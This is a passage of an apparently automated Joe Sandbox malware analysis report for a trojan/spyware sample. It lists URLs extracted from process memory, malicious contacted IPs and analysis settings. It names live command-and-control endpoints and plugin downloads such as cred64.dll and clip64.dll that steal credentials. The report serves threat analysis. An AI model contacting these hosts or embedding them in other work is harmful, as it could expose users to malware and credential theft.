http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp//	ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comrsiv&	ohcompetitive.exe, 0000000D.00000003.518048175.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518710431.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518583858.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518863186.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518224673.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/&	ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ohcompetitive.exe, 0000000D.00000003.488625546.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ohcompetitive.exe, 0000000D.00000002.726837895.0000000003101000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comuev	ohcompetitive.exe, 0000000D.00000003.545548318.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.541640595.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.540614622.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774280885.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538281911.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538905369.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.546200631.0000000005A04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comessedU	ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521203636.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521467754.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.393861047.000000000091F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.91.68.61/rock/index.phpSB	pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/X	ohcompetitive.exe, 0000000D.00000003.491309395.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.490758260.00000000059FC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/U	ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.68.61/rock/index.php1/rock/index.php-5	pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	explorer.exe, 00000001.00000000.420112413.00007FFA13109000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/Y0/	ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/o	ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/p	ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/g	ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.91.68.61/rock/Plugins/clip64.dllgP	pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	explorer.exe, 00000001.00000000.420112413.00007FFA13109000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.monotype.c	ohcompetitive.exe, 0000000D.00000003.506130055.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.68.61/rock/index.php=B	pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comF8	ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.516832849.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.68.61/rock/index.php1/rock/index.php	pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://stackoverflow.com/q/11564914/23354;	ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.cHI	ohcompetitive.exe, 0000000D.00000003.488625546.00000000059EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Responseh	n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.91.68.61/rock/Plugins/cred64.dllb05	pdates.exe, 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.fonts.com	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13Response	j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.de	ohcompetitive.exe, 0000000D.00000003.510678651.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.510766818.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.91.68.61	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
77.91.124.84	unknown	Russian Federation	64419	ECOTEL-ASRU	true
77.91.68.248	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
108.181.20.35	files.catbox.moe	Canada	852	ASN852CA	false
77.91.68.29	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
185.253.96.117	unknown	Romania	9009	M247GB	false
77.91.124.47	unknown	Russian Federation	64419	ECOTEL-ASRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1280728
Start date and time:	2023-07-27 01:31:25 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	q4B165cujP.exe
Original Sample Name:	1a2b0ab54afd2bae94b94b2d8bb128fc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@68/31@2/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.4% (good quality ratio 77.2%) Quality average: 57.9% Quality standard deviation: 37.7%
HCA Information:	Successful, ratio: 95% Number of executed functions: 88 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:32:58	API Interceptor	1631x Sleep call for process: explorer.exe modified
